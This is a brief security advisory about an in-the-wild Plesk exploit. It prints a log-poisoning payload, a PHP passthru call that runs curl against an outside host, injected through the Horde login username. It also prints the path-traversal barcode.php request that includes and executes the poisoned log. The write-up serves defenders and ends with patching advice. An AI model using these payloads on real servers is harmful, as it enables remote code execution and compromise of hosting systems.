Plesk Exploit: Readable Logfile Vulnerability
We recently noticed a high level of vulnerability scans looking for instances of Plesk and. We monitored this activity closely and discovered an exploit taking advantage of a readable Horde logfile.
Here is the anatomy of the exploit:
A bogus request is made to the Horde login page with the malicious code in the username. This generates a log entry like the following in /var/log/psa-horde/psa-horde.log:
Feb 16 21:47:11 HORDE [error] [imp] FAILED LOGIN xx.xxx.x.xxx to localhost:143[imap/notls] as <?php passthru("cd /tmp;curl -O -s http://google.com/ > /tmp/test.txt"); ?>@cip.test [on line 258 of "/usr/share/psa-horde/imp/lib/Auth/imp.php"]A request is then made to the barcode.php page (which calls /usr/share/psa-horde/lib/Horde/Image.php) to execute the commands written to the Horde log:
xx.xxx.x.xxx - - [16/Feb/2012:21:47.16 -0600] "GET /horde/util/barcode.php?type=../../../../../../../../../../../var/log/psa-horde/psa-horde.log%00 HTTP/1.1" 200 170 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
If the exploit is successful the hacker then begins uploading malicious files to the server. These malicious files then send out bogus UDP data over port 7. (source: Rackspace)
If you are using Plesk make certain you are keeping your security patches up to date and consider limiting access to certain system resources by IP.